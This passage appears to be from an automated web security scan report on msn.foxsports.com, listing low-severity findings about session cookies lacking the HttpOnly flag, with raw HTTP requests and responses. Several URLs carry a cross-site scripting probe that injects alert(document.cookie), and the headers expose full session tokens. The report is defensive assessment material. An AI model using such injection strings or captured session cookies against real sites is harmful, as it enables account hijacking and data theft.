Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/


8.2. http://msn.foxsports.com/account/regPopup  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/regPopup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/regPopup?divId=registration&efsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 13026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...

8.3. http://msn.foxsports.com/account/register  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/register?fu=http%3A%2F%2Fmsn.foxsports.com%2Fcollegefootball%2Fstory%2FStanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611%3F8dd92'-alert(document.cookie)-'c38e52b2865%3D1 HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:28:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:28:45 GMT
Connection: close
Content-Length: 22487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

8.4. http://msn.foxsports.com/account/transition  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 4257


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

8.5. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/bowlpickem/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fantasy/collegefootball/bowlpickem/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 33174
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336ff156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Expires: Sat, 08 Jan 2011 01:13:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:17 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


   
...[SNIP]...

8.6. http://msn.foxsports.com/fantasy/collegefootball/pickem/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/pickem/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fantasy/collegefootball/pickem/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 42110
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336ff156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Expires: Sat, 08 Jan 2011 01:13:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>


   
...[SNIP]...

8.7. http://msn.foxsports.com/account/verify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/verify

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/verify?euid=%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; 